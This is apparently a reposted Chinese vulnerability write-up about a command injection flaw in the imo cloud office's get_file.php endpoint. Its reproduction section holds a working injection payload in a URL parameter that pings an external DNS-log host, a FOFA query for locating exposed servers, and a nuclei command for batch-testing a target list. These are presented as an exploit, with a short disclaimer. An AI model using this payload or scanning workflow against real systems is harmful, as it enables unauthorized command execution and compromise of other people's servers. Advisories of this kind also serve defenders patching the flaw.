【】 imo 云办公室 get_file.php 远程命令执行漏洞(附EXP)

0x00前言

本文转载自:CN-SEC中文网
https://cn-sec.com/archives/1370417.html

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

imo云办公室由上海易睦网络科技有限公司于2007年创立,总部位于上海,imo云办公室管理运营企业即时通讯平台imo,包括对imo的在线支持,故障处理,客户服务等,对imo进行持续研发,提供在线升级等。imo云办公室系统 get_file.php 存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。

图片[1]-【】 imo 云办公室 get_file.php 远程命令执行漏洞(附EXP)-安全小天地

0x03 漏洞复现

fofa:app=\"iMO-云办公室\"

1.使用POC访问一下dnslog服务器并收到回显

http://{{Hostname}}/file/NDisk/get_file.php?cid=1&nid=;ping%20c0pshp.dnslog.cn;

nuclei批量验证已发表于知识星球

nuclei.exe -t imo_get_file_RCE.yaml -l subs.txt -stats
图片[2]-【】 imo 云办公室 get_file.php 远程命令执行漏洞(附EXP)-安全小天地

原文始发于微信公众号(融云攻防实验室):漏洞复现 imo 云办公室 get_file.php 远程命令执行漏洞

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容